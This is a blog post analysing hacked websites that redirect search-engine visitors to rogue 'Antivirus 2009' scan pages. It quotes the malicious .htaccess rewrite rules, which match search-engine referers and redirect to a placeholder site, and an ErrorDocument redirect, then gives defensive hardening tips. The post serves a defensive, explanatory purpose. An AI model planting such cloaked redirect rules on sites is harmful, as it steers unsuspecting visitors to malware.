Result of a Redirect: Antivirus 2009 Fake Scan Page

Result of a Redirect: Antivirus 2009 Fake Scan Page

Recently, we’ve come across a number of legitimate sites that have been hacked to redirect to various rogue anti-malware “scan” sites (including Antivirus2009).

The hack involves a twist. Visiting the sites directly (i.e. via a bookmark or manually entering the address) results in no redirect and, often, no signs of the hack. The malicious redirect only occurs when a user arrives at the site via search engine results.

This clever tactic serves to effectively delay any fixes. Site owners’ visiting their site directly won’t see any evidence of the redirect. But since many sites receive a majority of their traffic from search engines, that large majority of users will keep getting redirected to the malicious site.

The root cause of many of these hacks is a maliciously modified .htaccess file (commonly used on Apache web servers). In some cases it’s replaced completely, in other cases the bad rules are added to the existing contents. Most of the .htaccess files contain bad lines similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC]
...
RewriteRule .* http://badsite-omitted/ [R=301,L]

For those not familiar the innards of Apache or .htaccess files, this basically means:

Redirect any users who arrive from Google, Yahoo, MSN, or other search engines to “badsite”.

In some cases, common error pages are also redirected by the .htaccess file:

ErrorDocument 404 http://badsite-omitted/

The end result, of course, is that numerous unsuspecting users get redirected to sites pushing malware, spyware, rogue/fake anti-virus programs, and other junk.

How Did The Sites Get Hacked?

In many of these hacks, it seems as though lax file and folder permissions on shared hosting servers allowed other compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites. It’s also possible that unpatched, old versions of software installed on the compromised sites themselves allowed hackers to take advantage of a publicly-known vulnerability to compromise the site and overwrite the .htaccess file.

What Should I Do If It Happens to My Site?

Contact your web hosting provider immediately.

If you know what you’re doing, you can remove the offending code that has likely been placed in your .htaccess file(s), and change all of your passwords. But you still need an expert to look over your site to determine how the hackers got in, if they left anything else or any other changes, and to prevent it from happening again. If you don’t figure out how your site was hacked and fix it, it will happen again.

Basic Site Protection Tips

Even if you just have a small personal site, you should follow some simple tips to help keep it secure.

  1. Keep any software installed on your site up-to-date.
    Forum, blog, and other web applications often release frequent updates. Although it can be a pain, you should always ensure the latest versions are installed on your server. There’s often little easier for hackers than exploiting a publicly-known hole in old versions of this software. (In many cases, they have automated tools to do it.)
  2. Keep up-to-date on patches for the software installed on *your* computer.
    Don’t give anyone an easy way to access passwords or other important programs/data that might be stored on your computer. Keep your operating system and any other programs you use up-to-date. (Especially any tools you use to work with your site – including your web browser, FTP utilities, etc.)
  3. Know the “least-permissions” mantra, and use it well.
    On Unix servers, never set file permissions to 777 unless absolutely necessary. Many of the hacked sites we’ve come across likely had their .htaccess files set to 777 permissions (writable by anyone), to allow software installed on their server to modify them. Take the extra couple of minutes and make the modifications yourself – or set the permission to 777 only temporarily, and immediately revert them to 644 (or less) as soon as possible (e.g. after you’ve set up/installed your blog software).
    Also, consider using admin accounts only for administrator-level tasks. Create a separate account (in your forums, blog, etc.) for posting, and use it the majority of the time. (This will help limit the potential damage from cross-site-scripting vulnerabilities and other attacks.)
  4. Visit your site from search engine results pages.
    Possibly the easiest item on the list. Visit your site the way the majority of your users visit it: If you get lots of incoming traffic from search engines, then make sure you arrive at your site from a search engine results page every once in a while, to keep any eye out for any clever hacks or suspicious behavior.

Of course, that’s only the start. It’s tough to keep on top of everything, but with the simple steps above you’ll give your site a better chance of staying safe.